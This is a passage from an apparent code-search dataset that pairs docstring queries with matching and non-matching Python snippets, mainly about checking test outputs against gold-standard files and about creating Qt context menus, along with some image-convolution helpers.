pipeline(filters):\n pipe = partial(reduce, lambda acc, f: f(acc), filters)\n bil = bilateral()\n\n def procme(img):\n img = bil(img)\n return pipe(img)\n\n return lambda img: map(procme, [img[:, :, 0], img[:, :, 1], img[:, :, 2]])", "def conv2d(input, filters, image_shape=None, filter_shape=None,\r\n border_mode='valid', subsample=(1, 1), **kargs):\r\n\r\n #accept Constant value for image_shape and filter_shape.\r\n if image_shape is not None:\r\n image_shape = list(image_shape)\r\n for i in xrange(len(image_shape)):\r\n if image_shape[i] is not None:\r\n try:\r\n image_shape[i] = get_scalar_constant_value(\r\n as_tensor_variable(image_shape[i]))\r\n except NotScalarConstantError, e:\r\n raise NotScalarConstantError(\r\n \"The convolution need that the shape\"\r\n \" information are constant values. We got\"\r\n \" %s for the image_shape parameter\" %\r\n image_shape[i])\r\n assert str(image_shape[i].dtype).startswith('int')\r\n image_shape[i] = int(image_shape[i])\r\n if filter_shape is not None:\r\n filter_shape = list(filter_shape)\r\n for i in xrange(len(filter_shape)):\r\n if filter_shape[i] is not None:\r\n try:\r\n filter_shape[i] = get_scalar_constant_value(\r\n as_tensor_variable(filter_shape[i]))\r\n except NotScalarConstantError, e:\r\n raise NotScalarConstantError(\r\n \"The convolution need that the shape\"\r\n \" information are constant values. We got\"\r\n \" %s for the filter_shape \"\r\n \"parameter\" % filter_shape[i])\r\n assert str(filter_shape[i].dtype).startswith('int')\r\n filter_shape[i] = int(filter_shape[i])\r\n\r\n if image_shape and filter_shape:\r\n try:\r\n assert image_shape[1] == filter_shape[1]\r\n except Exception:\r\n print 'image ', image_shape, ' filters ', filter_shape\r\n raise\r\n\r\n if filter_shape is not None:\r\n nkern = filter_shape[0]\r\n kshp = filter_shape[2:]\r\n else:\r\n nkern, kshp = None, None\r\n\r\n if image_shape is not None:\r\n bsize = image_shape[0]\r\n imshp = image_shape[1:]\r\n else:\r\n bsize, imshp = None, None\r\n\r\n op = ConvOp(output_mode=border_mode, dx=subsample[0], dy=subsample[1],\r\n imshp=imshp, kshp=kshp, nkern=nkern, bsize=bsize, **kargs)\r\n\r\n return op(input, filters)", "def clConvolution(self, size, mask):", "def convolve(img, fourier_kernel):\n return np.fft.ifftshift(np.fft.irfft2(np.fft.rfft2(img) * fourier_kernel))", "def compute_output(self, input_images, filter_shape, image_shape, poolsize=(2, 2), \n Pstruct = None, b= None):\n\n assert image_shape[1] == filter_shape[1]\n # the bias is a 1D tensor -- one bias per output feature map\n # convolve input feature maps with filters\n\n\n batch_size = image_shape[0] \n fwidth = Pstruct[0]['U1'].shape[0]\n fheight = Pstruct[0]['U2'].shape[0]\n nbr_channels = image_shape[1]\n nbr_filters = Pstruct[0]['U3'].shape[0]\n initial_n_rows = image_shape[2]\n initial_n_cols = image_shape[3]\n \n # Final number of rows and columns \n final_n_rows = initial_n_rows - fwidth + 1\n final_n_cols = initial_n_cols - fheight + 1\n # The convolved input images\n input4D = theano.shared(np.zeros((batch_size, nbr_filters, \n final_n_rows, final_n_cols)))\n print 'batch size ', batch_size \n one_image_shape = (1, initial_n_rows, initial_n_cols)\n # assert one_image_shape == (1,28,28)\n for image_index in range(batch_size):\n for channel_index in range(nbr_channels):\n # Convolve image with index image_index in the batch\n input4D = self.convolve_one_image(input4D, \n input_images[image_index,channel_index,:,:].reshape((1, initial_n_rows, initial_n_cols)),\n one_image_shape,\n Pstruct, \n filter_shape, \n image_index,\n channel_index) \n # downsample each feature map individually, using maxpooling\n start = time.time()\n pooled_out = downsample.max_pool_2d(input=input4D,\n ds=poolsize, \n ignore_border=True)\n end = time.time()\n self.downsample_time = (end - start)*1000/ image_shape[0]\n \n \n # add the bias term. Since the bias is a vector (1D array), we first\n # reshape it to a tensor of shape (1,n_filters,1,1). Each bias will\n # thus be broadcasted across mini-batches and feature map\n # width & height\n self.output = T.tanh(pooled_out + b.dimshuffle('x', 0, 'x', 'x'))", "def my_imfilter(image, filter):\n\n assert filter.shape[0] % 2 == 1\n assert filter.shape[1] % 2 == 1\n\n p1 = filter.shape[0]//2\n p2 = filter.shape[1]//2\n pad1 = np.pad(image[:,:,0],((p1,p1),(p2,p2)),'reflect')\n pad2 = np.pad(image[:,:,1],((p1,p1),(p2,p2)),'reflect')\n pad3 = np.pad(image[:,:,2],((p1,p1),(p2,p2)),'reflect')\n image_pad = np.dstack([pad1,pad2,pad3])\n filtered_image = np.zeros((image.shape[0],image.shape[1],3))\n for c in range(3):\n for i in range(image.shape[0]):\n for j in range(image.shape[1]):\n filtered_image[i,j,c] = np.sum(image_pad[i:i+filter.shape[0],j:j+filter.shape[1],c]*filter)\n \n return filtered_image", "def convolution(image, kernel, scale=None, offset=0):\n kernel = np.array(kernel).flatten().tolist()\n if len(kernel)==9:\n size = (3,3)\n elif len(kernel)==25:\n size = (5,5)\n else:\n raise ValueError('Kernel size must be (3,3) or (5,5).')\n return image.filter(ImageFilter.Kernel(size, kernel, scale, offset))" ]
[ "0.7495514", "0.69816136", "0.6926627", "0.6658543", "0.6642495", "0.6620933", "0.66170156", "0.65827525", "0.65733373", "0.65717804", "0.6559641", "0.64966655", "0.6421656", "0.6419542", "0.6402899", "0.64008325", "0.63947445", "0.6285137", "0.62369514", "0.62244105", "0.6218898", "0.6186167", "0.6151984", "0.61247694", "0.6120538", "0.61137193", "0.611018", "0.6095561", "0.6094685", "0.608818" ]
0.69993824
1
Check that all output files are produced and are equivalent to the ones in goldStandard folder.
def _checkOutputs(self, outputs, random=False, errorthreshold=0.001): for out in outputs: outFile = os.path.join(self._testDir, self.outputDir, out) fileGoldStd = os.path.join(self.goldDir, out) # Check the expect output file was produced msg = "Missing expected output file:\n output: %s" % outFile self.assertTrue(os.path.exists(outFile), red(msg)) if random: print(yellow("WARNING: %s was created using a random seed, check skipped..." % outFile)) else: fnGoldStd = xmippLib.FileName(fileGoldStd) if fnGoldStd.isImage(): im1 = xmippLib.Image(fileGoldStd) im2 = xmippLib.Image(outFile) msg = "Images are not equal (+-%f):\n output: %s\n gold: %s" % \ (errorthreshold, outFile, fileGoldStd) self.assertTrue(im1.equal(im2, errorthreshold), red(msg)) elif fnGoldStd.isMetaData(): msg = "MetaDatas are not equal:\n output: %s\n gold: %s" % (outFile, fileGoldStd) self.assertTrue(xmippLib.compareTwoMetadataFiles(outFile, fileGoldStd), red(msg)) else: msg = "Files are not equal:\n output: %s\n gold: %s" % (outFile, fileGoldStd) self.assertTrue(xmippLib.compareTwoFiles(outFile, fileGoldStd, 0), red(msg))
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def check_generated_files(out_dir, output_list_file):\n xcpd_dir = os.path.join(out_dir, \"xcp_d\")\n found_files = sorted(glob(os.path.join(xcpd_dir, \"**/*\"), recursive=True))\n found_files = [os.path.relpath(f, out_dir) for f in found_files]\n\n # Ignore figures\n found_files = [f for f in found_files if \"figures\" not in f]\n\n with open(output_list_file, \"r\") as fo:\n expected_files = fo.readlines()\n expected_files = [f.rstrip() for f in expected_files]\n\n if sorted(found_files) != sorted(expected_files):\n expected_not_found = sorted(list(set(expected_files) - set(found_files)))\n found_not_expected = sorted(list(set(found_files) - set(expected_files)))\n\n msg = \"\"\n if expected_not_found:\n msg += \"\\nExpected but not found:\\n\\t\"\n msg += \"\\n\\t\".join(expected_not_found)\n\n if found_not_expected:\n msg += \"\\nFound but not expected:\\n\\t\"\n msg += \"\\n\\t\".join(found_not_expected)\n raise ValueError(msg)", "def test_output_exists():\n global out_dir, cor_dir\n assert(path.exists(path.join(out_dir, 'oshea_similarity.json')))", "def checkAllFilesGenerated(self):\n root = get_exhale_root(self)\n containmentFolder = self.getAbsContainmentFolder()\n for node in root.all_nodes:\n if node.kind in [\"enumvalue\", \"group\"]:\n continue\n gen_file_path = os.path.join(containmentFolder, node.file_name)\n self.assertTrue(\n os.path.isfile(gen_file_path),\n \"File for {kind} node with refid=[{refid}] not generated to [{gen_file_path}]!\".format(\n kind=node.kind, refid=node.refid, gen_file_path=gen_file_path\n )\n )", "def check_all_files_and_dirs(self):\n err = 0\n err_m = ''\n warning = 0\n warning_m = ''\n # Check the pdb file for refinement\n if self.refine_pdb_in == None:\n err = 1\n err_m += '\\nPdb file should be supplied'\n else:\n if self.check_single_file(self.refine_pdb_in):\n self.refine_pdb_in = os.path.abspath(self.refine_pdb_in)\n else:\n err = 1\n err_m += '\\nFile not found: %s' %(self.refine_pdb_in)\n\n # Check the pdb file for distance analysis\n if self.check_single_file(self.X8_pdb_in):\n self.X8_pdb_in = os.path.abspath(self.X8_pdb_in)\n else:\n self.X8_pdb_in != None\n warning = 1\n warning_m += '\\nXtrapol8 pdb_in not found. No additional analysis will be applied'\n\n # Check additional files and append them to a string\n additional = \"\"\n for fle in self.additional:\n if len(fle)>0:\n if self.check_single_file(fle):\n new_add = os.path.abspath(fle)\n additional = additional + \"%s \" % (new_add)\n else:\n err = 1\n err_m += '\\nFile not found: %s' %(fle)\n self.additional = additional\n\n #Check the output directory\n if os.path.isdir(self.outdir):\n self.outdir = os.path.abspath(self.outdir)\n else:\n err = 1\n err_m += \"\\nXtrapol8 output directory cannot be found.\" \\\n \"Please run this from the same directory from which you ran Xtrapol8.\"\n\n #Check the phil file for reciprocal space refinement\n if self.check_single_file(self.reciprocal_space_phil):\n self.reciprocal_space_phil = os.path.abspath(self.reciprocal_space_phil)\n else:\n self.reciprocal_space_phil = ''\n warning = 1\n warning_m += '\\nPhil for reciprocal space refinement not found. Refinement will use default parameters.'\n\n\n #Check the phil file for real space refinement\n if self.check_single_file(self.real_space_phil):\n self.real_space_phil = os.path.abspath(self.real_space_phil)\n else:\n self.real_space_phil = ''\n warning = 1\n warning_m += '\\nPhil for real space refinement not found. Refinement will use default parameters.'\n\n #Check the residue list for distance analysis\n if self.check_single_file(self.residue_list):\n self.residue_list = os.path.abspath(self.residue_list)\n else:\n self.residue_list = None\n warning = 1\n warning_m += '\\nResidue list not found. Distance analysis (if required) will be performed without residue list.'\n\n return err, err_m, warning, warning_m", "def test_conformance_tests_test_output(self):\n style = pycodestyle.StyleGuide(quiet=True)\n result = style.check_files(['tests/test_output.py'])\n self.assertEqual(result.total_errors, 0,\n \"Found code style errors (and warnings).\")", "def check_file_output(self, actual: str, expected: str):\n assert self._program_executed, f\"You first need to `execute` the program before checking its outputs!\"\n assert actual in self._write_files, f\"Unknown output file {actual}. Did you forget to provide it to the program by calling input_write_filename?\"\n full_expected = _root_dir / expected\n assert full_expected.is_file(), f\"Reference file {full_expected} does not exist!\"\n # check to make sure the output file exists\n full_actual = _root_dir / actual\n self._test.assertTrue(full_actual.is_file(), f\"It seems like the program never created the output file {full_actual}\")\n # open and compare the files\n with open(full_actual, 'rb') as a:\n actual_bin = a.read()\n with open(full_expected, 'rb') as e:\n expected_bin = e.read()\n self._test.assertEqual(actual_bin, expected_bin, f\"Bytes of {actual} and {expected} did not match!\")", "def test_conformance_core_output(self):\n style = pycodestyle.StyleGuide(quiet=True)\n result = style.check_files(['core/output.py'])\n self.assertEqual(result.total_errors, 0,\n \"Found code style errors (and warnings).\")", "def _assert_correct_files_are_present(outputdir: Path) -> None:\n for plane in PLANES:\n assert (outputdir / f\"{AMP_BETA_NAME}{plane.lower()}.tfs\").is_file()\n assert (outputdir / f\"{BETA_NAME}{plane.lower()}.tfs\").is_file()\n assert (outputdir / f\"{PHASE_NAME}{plane.lower()}.tfs\").is_file()\n assert (outputdir / f\"{TOTAL_PHASE_NAME}{plane.lower()}.tfs\").is_file()\n assert (outputdir / f\"{ORBIT_NAME}{plane.lower()}.tfs\").is_file()\n assert (outputdir / f\"{DISPERSION_NAME}x.tfs\").is_file()\n assert (outputdir / f\"{NORM_DISP_NAME}x.tfs\").is_file() # no norm disp in Y plane\n\n for rdt in [\"1001\", \"1010\"]:\n assert (outputdir / f\"f{rdt}.tfs\").is_file()", "def checkCopiedFiles(self):\n self.missingAiCopies = 0\n self.invalidAiCopies = 0\n self.invalidMapCopies = 0\n self.missingMapCopies = 0\n\n for iFile in self.inputFilesAll:\n if not (os.path.isfile(self.MAPCOPY + iFile + '.msb')):\n self.missingMapCopies += 1\n else:\n with open(self.MAPCOPY + iFile + '.msb', 'rb') as testFile:\n if (len(testFile.read()) < 10):\n self.invalidMapCopies += 1\n\n if not (iFile == \"m12_00_00_01\"):\n if (self.useDCX):\n if not (os.path.isfile(self.AICOPY + iFile + '.luabnd.dcx')):\n self.missingAiCopies += 1\n else:\n with open(self.AICOPY + iFile + '.luabnd.dcx', 'rb') as testFile:\n if (len(testFile.read()) < 10):\n self.invalidAiCopies += 1\n else:\n if not (os.path.isfile(self.AICOPY + iFile + '.luabnd')):\n self.missingAiCopies += 1\n else:\n with open(self.AICOPY + iFile + '.luabnd', 'rb') as testFile:\n if (len(testFile.read()) < 10):\n self.invalidAiCopies += 1\n\n if (self.missingAiCopies > 0 or self.invalidAiCopies > 0 or self.missingMapCopies > 0 or self.invalidMapCopies > 0 or self.missingSfxCopies > 0 or self.invalidSfxCopies > 0):\n return False\n else:\n return True", "def test_check_if_output_file_exists():\n input_file = os.path.join(os.getcwd(), 'tests', 'input_test_file.docx')\n output_file = os.path.join(os.getcwd(), 'tests', 'output_test_file.txt')\n\n questions_parser = QuestionsParser()\n questions_parser.main(argv=['-i', input_file, '-o', output_file])\n assert os.path.exists(output_file)\n os.unlink(output_file)", "def check_systtests_pickle_files(self):\n # Make sure that there have been no more new scan points run since this\n # last processing. To do this, get the number of output directories\n # Compare this to the number in the pickle files.\n self.num_systematics = {}\n for basename in nsort(os.listdir(self.logdir)):\n if 'pckl' in basename:\n continue\n basename_content = nsort(\n os.listdir(os.path.join(self.logdir, basename))\n )\n # This means it is a directory containing something useful\n if 'config_summary.json' in basename_content:\n bits = basename.split('toy_')[-1].split('_')\n toyname = None\n add_bit = True\n for bit in bits:\n if bit == '' or bit == 'inj':\n add_bit = False\n if add_bit:\n if toyname is None:\n toyname = bit\n else:\n toyname += '_%s'%bit\n if '_full_syst_baseline' in toyname:\n toyname = toyname.split('_full_syst_baseline')[0]\n toyname = 'toy_%s_asimov'%toyname\n if toyname not in self.num_systematics.keys():\n self.num_systematics[toyname] = 0\n if 'wrong' in basename:\n # Only want to include each systematic once, but\n # they will have two directions.\n if 'pve' in basename:\n self.num_systematics[toyname] += 1\n else:\n self.num_systematics[toyname] += 1\n data_sets = from_file(os.path.join(self.logdir,\n 'data_sets.pckl'))\n if sorted(data_sets.keys()) != sorted(self.num_systematics.keys()):\n logging.info(\n 'Found files I assume to be from a previous run of'\n ' this processing script containing these truths: %s. '\n 'However, based on the directories in the overall '\n 'output directory there should be these truths: %s, so '\n 'they will be regenerated.'%(\n sorted(data_sets.keys()),\n sorted(self.num_systematics.keys())\n )\n )\n pickle_there = True\n for toyname in sorted(self.num_systematics.keys()):\n if len(data_sets[toyname].keys()) != self.num_systematics[toyname]:\n pickle_there = False\n if pickle_there:\n logging.info(\n 'Found files I assume to be from a previous run of'\n ' this processing script containing %i sytematics. If '\n 'this seems incorrect please delete the files: '\n 'data_sets.pckl, all_params.pckl and labels.pckl '\n 'from the logdir you have provided.'%(\n self.num_systematics[self.num_systematics.keys()[0]])\n )\n else:\n logging.info(\n 'Found files I assume to be from a previous run of'\n ' this processing script containing %i systematics. '\n 'However, based on the number of directories in the overall '\n 'output directory there should be %i systematics in '\n 'these pickle files, so they will be regenerated.'%(\n len(data_sets[data_sets.keys()[0]].keys()),\n self.num_systematics[self.num_systematics.keys()[0]]\n )\n )\n pickle_there = False\n\n return pickle_there", "def test_multiple_output_files(self):\r\n convert_fastq(self.fasta_file_path, self.qual_file_path,\r\n multiple_output_files=True,\r\n output_directory=self.output_dir,\r\n per_file_buffer_size=23)\r\n\r\n sample_ids = [('PC.634', expected_fastq_634_default),\r\n ('PC.354', expected_fastq_354_default),\r\n ('PC.481', expected_fastq_481_default)]\r\n for sample_id, expected_output in sample_ids:\r\n actual_output_file_path = get_filename_with_new_ext(\r\n self.fasta_file_path,\r\n '_' + sample_id + '.fastq',\r\n self.output_dir)\r\n\r\n actual_output_file = open(actual_output_file_path)\r\n actual_output = actual_output_file.read()\r\n actual_output_file.close()\r\n self._files_to_remove.append(actual_output_file_path)\r\n\r\n self.assertEquals(actual_output, expected_output)", "def _check_numpy_output(self, cwd):\n\n for ii, refname in enumerate(self.files):\n if self.forms[ii] == \"numpy\":\n try:\n ref_output = np.loadtxt(\n Path(cwd) / refname, usecols=self.usecol[ii]\n )\n except IOError:\n raise IOError(\n 'Please provide a reference properties output named \"{}\"'.format(\n refname\n )\n )\n except ValueError:\n raise ValueError(\n \"Please check ref_simulation.out in {}\".format(\n str((self.parent / cwd).absolute())\n )\n )\n\n fname = refname[4:]\n test_output = np.loadtxt(self.tmp_dir / fname, usecols=self.usecol[ii])\n\n try:\n np.testing.assert_allclose(\n test_output, ref_output, rtol=1.0e-7, atol=1.0e-15\n )\n # print(\"No anomaly during the regtest for {}\".format(refname))\n except AssertionError:\n raise AssertionError(\n \"ANOMALY: Disagreement between reference and {} in {}\".format(\n fname, str((self.parent / cwd).absolute())\n )\n )", "def test_multiple_output_files(self):\r\n convert_fastaqual(self.fasta_file_path,\r\n multiple_output_files=True,\r\n output_directory=self.output_dir,\r\n per_file_buffer_size=23)\r\n\r\n sample_id_s = [('PC.634', expected_fasta_634_default,\r\n expected_qual_634_default),\r\n ('PC.354', expected_fasta_354_default,\r\n expected_qual_354_default),\r\n ('PC.481', expected_fasta_481_default,\r\n expected_qual_481_default)]\r\n for sample_id, expected_fasta, expected_qual in sample_id_s:\r\n actual_output_fasta_path = get_filename_with_new_ext(\r\n self.fasta_file_path,\r\n '_' + sample_id + '.fna',\r\n self.output_dir)\r\n\r\n actual_output_qual_path = get_filename_with_new_ext(\r\n self.fasta_file_path,\r\n '_' + sample_id + '.qual',\r\n self.output_dir)\r\n\r\n actual_output_fasta = open(actual_output_fasta_path)\r\n actual_output_qual = open(actual_output_qual_path)\r\n actual_fasta = actual_output_fasta.read()\r\n actual_output_fasta.close()\r\n actual_qual = actual_output_qual.read()\r\n actual_output_qual.close()\r\n self._files_to_remove.append(actual_output_fasta_path)\r\n self._files_to_remove.append(actual_output_qual_path)\r\n\r\n self.assertEquals(actual_fasta, expected_fasta)\r\n self.assertEquals(actual_qual, expected_qual)", "def output_files_exist(self):\n return all([split.exists() for split in self.split_files])", "def _CompareFiles(self):\n if sys.platform == 'win32':\n # On Windows flags are stored in .rsp files which are created by building.\n print >> sys.stderr, 'Building in %s...' % _GN_OUT_DIR\n Run('ninja -C %s -d keeprsp %s' % (_GN_OUT_DIR, self._gn_target))\n print >> sys.stderr, 'Building in %s...' % _GYP_OUT_DIR\n Run('ninja -C %s -d keeprsp %s' % (_GYP_OUT_DIR, self._gn_target))\n\n gn = Run('ninja -C %s -t commands %s' % (_GN_OUT_DIR, self._gn_target))\n gyp = Run('ninja -C %s -t commands %s' % (_GYP_OUT_DIR, self._gyp_target))\n\n self._gn_flags = self._GetFlags(gn.splitlines(),\n os.path.join(os.getcwd(), _GN_OUT_DIR))\n self._gyp_flags = self._GetFlags(gyp.splitlines(),\n os.path.join(os.getcwd(), _GYP_OUT_DIR))\n\n all_files = sorted(self.gn_files & self.gyp_files)\n for filename in all_files:\n gyp_flags = self._gyp_flags[filename]\n gn_flags = self._gn_flags[filename]\n self._CompareLists(filename, gyp_flags, gn_flags, 'dash_f')\n self._CompareLists(filename, gyp_flags, gn_flags, 'defines')\n self._CompareLists(filename, gyp_flags, gn_flags, 'include_dirs')\n self._CompareLists(filename, gyp_flags, gn_flags, 'warnings',\n # More conservative warnings in GN we consider to be OK.\n dont_care_gyp=[\n '/wd4091', # 'keyword' : ignored on left of 'type' when no variable\n # is declared.\n '/wd4456', # Declaration hides previous local declaration.\n '/wd4457', # Declaration hides function parameter.\n '/wd4458', # Declaration hides class member.\n '/wd4459', # Declaration hides global declaration.\n '/wd4702', # Unreachable code.\n '/wd4800', # Forcing value to bool 'true' or 'false'.\n '/wd4838', # Conversion from 'type' to 'type' requires a narrowing\n # conversion.\n ] if sys.platform == 'win32' else None,\n dont_care_gn=[\n '-Wendif-labels',\n '-Wextra',\n '-Wsign-compare',\n ] if not sys.platform == 'win32' else None)\n self._CompareLists(filename, gyp_flags, gn_flags, 'other')", "def output_files(self):\n # Output file for Moller generation\n if 'moller' in self.name:\n return ['moller.stdhep']\n # Output file for beam generation\n return ['beam.stdhep']", "def blankOutputFiles():\n print(\"Checking for blank output files\")\n find_output = re.compile(r\"/\\* Output:(.*)\\*/\", re.DOTALL)\n for java in config.example_dir.rglob(\"*.java\"):\n with java.open() as codeFile:\n output = find_output.search(codeFile.read())\n if output:\n # print(output.group(1))\n if not output.group(1).strip():\n print(java)", "def match_files(gold_folder, sys_folder):\n\n print \"Compiling files...\"\n # Get a list of files in the folders supplied.\n gold_files = compile_files(gold_folder) # nnnnG.xml\n sys_files = compile_files(sys_folder) # nnnnXXN.xml\n\n print \"%d gold files found in %s\" % (len(gold_files), base_name(gold_folder))\n print \"%d system files found in %s\\n\" % (len(sys_files), base_name(sys_folder))\n\n print \"Matching system files to gold files...\"\n # Match them up, where nnnn must be common in a pair.\n pairs = [(f1, f2) for f1 in gold_files for f2 in sys_files\n if base_name(f2).startswith(base_name(f1).split(\"GE.\")[0])]\n\n return pairs", "def process_cleanup(self, output_file=None, output_list=None):\n if output_file:\n self.check_output_file( output_file )\n elif output_list:\n for output_file in output_list:\n self.check_output_file( output_file )\n log.info('All expected output files found - process successful!\\n')", "def testFilesExist(self):\n \n for year in range(2007,2013):\n self.assertTrue(os.path.exists(\"./IncomeHistogram_\"+ str(year)+\".pdf\"), \"A histogram didn't save to output.\")\n self.assertTrue(os.path.exists(\"./LogIncomeHistogram_\"+ str(year)+\".pdf\"), \"A histogram didn't save to output.\")\n self.assertTrue(os.path.exists(\"./IncomeBoxplot(log)_\"+ str(year)+\".pdf\"), \"A boxplot didn't save to output.\") \n self.assertTrue(os.path.exists(\"./results.txt\"), \"Results file doesn't exist.\")", "def check_output(self):\n directory, file = split(self.target)\n if not exists(directory):\n mkdir(directory)\n if exists(self.target):\n unlink(self.target)", "def com_google_fonts_check_002(fonts):\n\n directories = []\n for target_file in fonts:\n directory = os.path.dirname(target_file)\n if directory not in directories:\n directories.append(directory)\n\n if len(directories) == 1:\n yield PASS, \"All files are in the same directory.\"\n else:\n yield FAIL, (\"Not all fonts passed in the command line\"\n \" are in the same directory. This may lead to\"\n \" bad results as the tool will interpret all\"\n \" font files as belonging to a single\"\n \" font family. The detected directories are:\"\n \" {}\".format(directories))", "def com_google_fonts_check_002(fonts):\n\n directories = []\n for target_file in fonts:\n directory = os.path.dirname(target_file)\n if directory not in directories:\n directories.append(directory)\n\n if len(directories) == 1:\n yield PASS, \"All files are in the same directory.\"\n else:\n yield FAIL, (\"Not all fonts passed in the command line\"\n \" are in the same directory. This may lead to\"\n \" bad results as the tool will interpret all\"\n \" font files as belonging to a single\"\n \" font family. The detected directories are:\"\n \" {}\".format(directories))", "def test_check_mapping_file_multiple_problems(self):\r\n\r\n check_mapping_file(mapping_fp=self.errors_warnings_mapping_fp,\r\n output_dir=self.output_dir,\r\n added_demultiplex_field=\"DoesNotExist\",\r\n verbose=False)\r\n\r\n # Check existence of expected output files\r\n output_html_fp = join(self.output_dir,\r\n basename(self.errors_warnings_mapping_fp).replace('.txt', '.html'))\r\n output_corrected_fp =\\\r\n join(self.output_dir,\r\n basename(self.errors_warnings_mapping_fp).replace('.txt',\r\n '_corrected.txt'))\r\n output_log_fp =\\\r\n join(self.output_dir,\r\n basename(self.errors_warnings_mapping_fp).replace('.txt', '.log'))\r\n overlib_js_fp = join(self.output_dir, 'overlib.js')\r\n\r\n self.assertTrue(exists(output_html_fp))\r\n self.assertTrue(exists(output_corrected_fp))\r\n self.assertTrue(exists(output_log_fp))\r\n self.assertTrue(exists(overlib_js_fp))\r\n\r\n # Check output data for expected results\r\n\r\n html_data = \"\".join([line for line in open(output_html_fp, \"U\")])\r\n corrected_data =\\\r\n \"\".join([line for line in open(output_corrected_fp, \"U\")])\r\n log_data = \"\".join([line for line in open(output_log_fp, \"U\")])\r\n\r\n self.assertEqual(html_data, self.expected_html_errors_warnings_output)\r\n self.assertEqual(corrected_data,\r\n self.expected_corrected_data_errors_warnings)\r\n self.assertEqual(log_data, self.expected_log_errors_warnings_output)", "def test_two_files():\n\n out_file = ''.join(\n random.choices(string.ascii_uppercase + string.digits, k=5))\n try:\n if os.path.isfile(out_file):\n os.remove(out_file)\n\n rv, out = getstatusoutput(f'{prg} -f {tair} {amigo} -o {out_file}')\n assert rv == 0\n assert re.search('1: tair_heat.txt', out)\n assert re.search('2: amigo_heat.txt', out)\n assert re.search(\n f'Wrote 20 gene IDs from 2 files to file \"{out_file}\"', out)\n assert os.path.isfile(out_file)\n exp_two = '\\n'.join(\n sorted(\"\"\"\n AT5G12020 AT3G06400 AT2G33590 AT1G54050 AT5G67030 AT4G14690 AT1G16030 AT5G03720 AT3G10800 \n AT5G12140 AT1G64280 AT3G24500 AT3G09440 AT3G04120 AT4G19630 AT1G16540 AT2G22360 AT1G13930 \n AT5G41340 AT3G24520\n \"\"\".split()))\n assert open(out_file).read().strip() == exp_two.strip()\n\n finally:\n if os.path.isfile(out_file):\n os.remove(out_file)", "def test_otter_check_script(self):\n # run for each individual test\n for file in glob(TEST_FILES_PATH + \"tests/*.py\"):\n # capture stdout\n output = StringIO()\n with contextlib.redirect_stdout(output):\n\n # mock block_print otherwise it interferes with capture of stdout\n with mock.patch(\"otter.check.block_print\"):\n check(\n TEST_FILES_PATH + \"file0.py\", \n question = os.path.split(file)[1][:-3],\n tests_path = os.path.split(file)[0],\n )\n\n if os.path.split(file)[1] != \"q2.py\":\n self.assertEqual(\n output.getvalue().strip().split(\"\\n\")[-1].strip(), \n \"All tests passed!\", \n \"Did not pass test at {}\".format(file)\n )\n\n # run the file for all questions\n output = StringIO()\n with contextlib.redirect_stdout(output):\n with mock.patch(\"otter.check.block_print\"):\n check(\n TEST_FILES_PATH + \"file0.py\", \n tests_path = os.path.split(file)[0],\n )\n self.assertEqual(\n output.getvalue().strip(), \n dedent(\"\"\"\\\n [0. 0.02002002 0.04004004 0.06006006 0.08008008]\n q1 results: All test cases passed!\n q2 results:\n q2 - 1 result:\n Trying:\n 1 == 1\n Expecting:\n False\n **********************************************************************\n Line 2, in q2 0\n Failed example:\n 1 == 1\n Expected:\n False\n Got:\n True\n\n q2 - 2 result:\n Test case passed!\n q3 results: All test cases passed!\n q4 results: All test cases passed!\n q5 results: All test cases passed!\"\"\"), \n \"Did not pass correct tests\"\n )", "def clean(self):\n print(\"Cleaning outputs in %s\" % self.args.output)\n files = glob.glob(self.args.output + \"*.pkl\")\n for f in files:\n if os.path.exists(f):\n os.remove(f)", "def evaluate_ga_all_fitness_outputs(self):\n outputname = \"my_output\"\n dircontents = os.listdir(self.keywords['name'])\n filelist = list()\n for myfile in dircontents:\n if outputname in myfile:\n filelist.append(os.path.join(self.keywords['name'], myfile))\n filelist.sort()\n last_file = filelist[-1]\n second_to_last_file = filelist[-2]\n from amy_ga_code import can_we_stop_yet\n okay_to_stop = can_we_stop_yet.evaluate(last_file, second_to_last_file)\n if okay_to_stop:\n pass\n else:\n last_time = os.path.basename(last_file).split(\"_\")[-1]\n new_seed_file = \"my_structure_%s\" % last_time\n self.clear_ga_vasp_ingredient(\"vasp_ingredient_match_my_name_in_recipe\", new_seed_file)\n self.change_my_status(\"W\")", "def _test_output_created(self):\n TestHarness._test_output_created(self)\n source = glob.glob(os.path.join(os.getcwd(), 'source.*'))\n assert len(source) == 1, 'Either multiple or no source files ' \\\n 'exist.'\n assert source[0].endswith('h5'), \\\n 'Source file is not a HDF5 file.'" ]
[ "0.6592521", "0.658346", "0.6503008", "0.6485635", "0.64343256", "0.63431185", "0.62933356", "0.6255054", "0.6212415", "0.6163191", "0.6134901", "0.6122998", "0.60994726", "0.60929835", "0.6076817", "0.60678595", "0.6047929", "0.60258394", "0.6014823", "0.5997116", "0.59866434", "0.5985454", "0.59558517", "0.59558517", "0.59490526", "0.5934937", "0.58901906", "0.58860487", "0.5861957", "0.583546" ]
0.7571529
0
Create a context menu for the widget (the main widget for this view)
def make_context_menu(self, widget): self.context_menu_widget = widget self.context_menu_widget.setContextMenuPolicy(Qt.CustomContextMenu) self.context_menu_widget.customContextMenuRequested.connect(self.request_context_menu) self.context_menu = QMenu()
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def widget_ctx_menu(self):\n def toggle_step():\n self.showStepExponent = not self.showStepExponent\n\n def toggle_write():\n self.writeOnPress = not self.writeOnPress\n\n menu = self.lineEdit().createStandardContextMenu()\n menu.addSeparator()\n ac = menu.addAction('Toggle Show Step Size')\n ac.triggered.connect(toggle_step)\n\n ac_write = menu.addAction('Toggle Write On Press')\n ac_write.triggered.connect(toggle_write)\n\n return menu", "def _create_context_menu(self):\n self.menu = Gtk.Menu()\n delete_menu = Gtk.MenuItem(\"Delete Task\")\n self.menu.append(delete_menu)", "def addContextMenuItems(*args):", "def _createMainContextMenu(self) -> None:\n # separators for improved readability\n separator1 = QAction(self)\n separator1.setSeparator(True)\n separator2 = QAction(self)\n separator2.setSeparator(True)\n\n self._mainFileView.setContextMenuPolicy(Qt.ActionsContextMenu)\n for action in self._fileActions:\n if action == self._exitAction: # don't include Exit button in the context menu\n continue\n self._mainFileView.addAction(action)\n self._mainFileView.addAction(separator1)\n for action in self._editActions:\n self._mainFileView.addAction(action)\n self._mainFileView.addAction(separator2)\n for action in self._viewActions:\n self._mainFileView.addAction(action)", "def contextMenuEvent(self, event):\n menu = QMenu()\n self.action_options.add_to_context_menu(menu)\n 